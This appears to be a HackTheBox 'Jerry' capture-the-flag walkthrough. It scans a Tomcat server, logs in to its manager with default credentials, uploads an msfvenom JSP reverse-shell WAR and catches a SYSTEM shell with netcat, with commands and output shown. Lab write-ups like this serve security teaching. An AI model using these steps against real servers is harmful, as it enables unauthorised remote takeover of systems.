Today we will take a look at HackTheBox:Jerry. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
└─# nmap -Pn -p- -sCV --open -oN nmap/open     STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1

Looking at port 8080 we see apache tomcat. We go to the /manager extension, and enter the default username and password.

Username: tomcat

Password: s3cret

Here we get an reverse shell.

  • System
└─# msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=9999 -f war -o rshell.war
Payload size: 1103 bytes
Final size of war file: 1103 bytes
Saved as: rshell.war

Now let’s upload it.

Let’s run and listen

Just click on /rshell.

└─# nc -nvlp 9999                                     
listening on [any] 9999 ...
connect to [] from (UNKNOWN) [] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
Volume in drive C has no label.
Volume Serial Number is 0834-6C04
Directory of C:\apache-tomcat-7.0.8806/19/2018 04:07 AM <DIR> .
06/19/2018 04:07 AM <DIR> ..
06/19/2018 04:06 AM <DIR> bin
06/19/2018 06:47 AM <DIR> conf
06/19/2018 04:06 AM <DIR> lib
05/07/2018 02:16 PM 57,896 LICENSE
07/26/2022 04:47 PM <DIR> logs
05/07/2018 02:16 PM 1,275 NOTICE
05/07/2018 02:16 PM 9,600 RELEASE-NOTES
05/07/2018 02:16 PM 17,454 RUNNING.txt
06/19/2018 04:06 AM <DIR> temp
07/26/2022 04:53 PM <DIR> webapps
06/19/2018 04:34 AM <DIR> work
4 File(s) 86,225 bytes
9 Dir(s) 2,408,210,432 bytes free
nt authority\system

And now we are the system

“If you have any questions or comments, please do not hesitate to write. Have a good days”



Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days